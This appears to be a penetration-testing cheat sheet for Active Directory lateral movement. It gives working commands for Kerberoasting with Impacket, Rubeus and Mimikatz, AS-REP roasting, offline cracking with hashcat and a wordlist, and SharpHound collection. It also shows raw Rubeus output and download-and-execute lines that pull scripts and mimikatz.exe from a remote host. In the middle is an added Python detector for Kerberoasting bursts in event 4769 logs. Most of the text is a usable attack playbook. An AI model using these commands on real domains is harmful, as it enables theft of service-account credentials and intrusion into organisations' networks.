AD Lateral Movement

Obtaining a Kerberos ticket with Rubeus

## Impacket method
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
## Mimikatz method
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
.\mimikatz.exe 'kerberos::list /export' exit


C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 3


[*] SamAccountName         : ExchangeService
[*] DistinguishedName      : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName   : HTTP/ExchangeService.xor.com
[*] PwdLastSet             : 5/20/2019 1:07:08 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt
python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt /home/gerh/Escritorio/OSCP/Machines/host-123/KERBEROS/4-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi
hashcat --force -m 13100 hash-end.txt /usr/share/wordlists/rockyou.txt
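On the detection side, the Rubeus output above gives away what the request looks like on a domain controller: one TGS request per kerberoastable user account (the LDAP filter excludes computer accounts and krbtgt), and RC4_HMAC (etype 0x17) tickets unless AES is forced. The following is an added example, not part of the original notes, that applies that logic to constructed Windows Security event 4769 records; the key=value field layout is an assumption about how a SIEM would extract the event.

```python
import re
from collections import defaultdict

# Constructed sample of event 4769 (Kerberos service ticket request) records,
# not real telemetry. 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=jdoe@XOR.COM ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=jdoe@XOR.COM ServiceName=XOR-APP23$ TicketEncryptionType=0x17 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=jdoe@XOR.COM ServiceName=ExchangeService TicketEncryptionType=0x17 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=jdoe@XOR.COM ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=jdoe@XOR.COM ServiceName=backupsvc TicketEncryptionType=0x17 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=asmith@XOR.COM ServiceName=ExchangeService TicketEncryptionType=0x17 IpAddress=10.10.10.77",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_4769(line):
    """Turn one key=value record into a dict of field -> value."""
    return dict(FIELD_RE.findall(line))


def is_rc4_user_spn_request(ev):
    """RC4 service ticket for a user account SPN.

    Mirrors the Rubeus LDAP filter: krbtgt and computer accounts (names
    ending in '$') are skipped, since tooling does not request those.
    """
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("TicketEncryptionType", "").lower() == "0x17"
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def kerberoast_candidates(lines, min_services=3):
    """Group RC4 user-SPN requests by (source IP, requesting user) and return
    the pairs that asked for tickets to at least min_services distinct
    service accounts, the burst pattern a 'kerberoast' run produces."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_4769(line)
        if is_rc4_user_spn_request(ev):
            seen[(ev["IpAddress"], ev["TargetUserName"])].add(ev["ServiceName"])
    return {key: sorted(svcs) for key, svcs in seen.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    for (ip, user), svcs in kerberoast_candidates(SAMPLE_4769).items():
        print(f"{ip} as {user}: RC4 tickets for {', '.join(svcs)}")
```

A single RC4 request (asmith above) is not flagged by itself, since legacy services legitimately use RC4; the burst across many user SPNs from one source is the signal, and AES-only service accounts remove the weak etype entirely.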

AS-REP

Rubeus.exe asreproast
# Insert 23$ after $krb5asrep$ so that each line starts with $krb5asrep$23$User (the format hashcat mode 18200 expects)
hashcat -m 18200 hash.txt Pass.txt

SHARPHOUND

.\SharpHound.exe -c all

PS C:\htb> Import-Module .\SharpHound.ps1
PS C:\htb> Invoke-BloodHound -CollectionMethod all
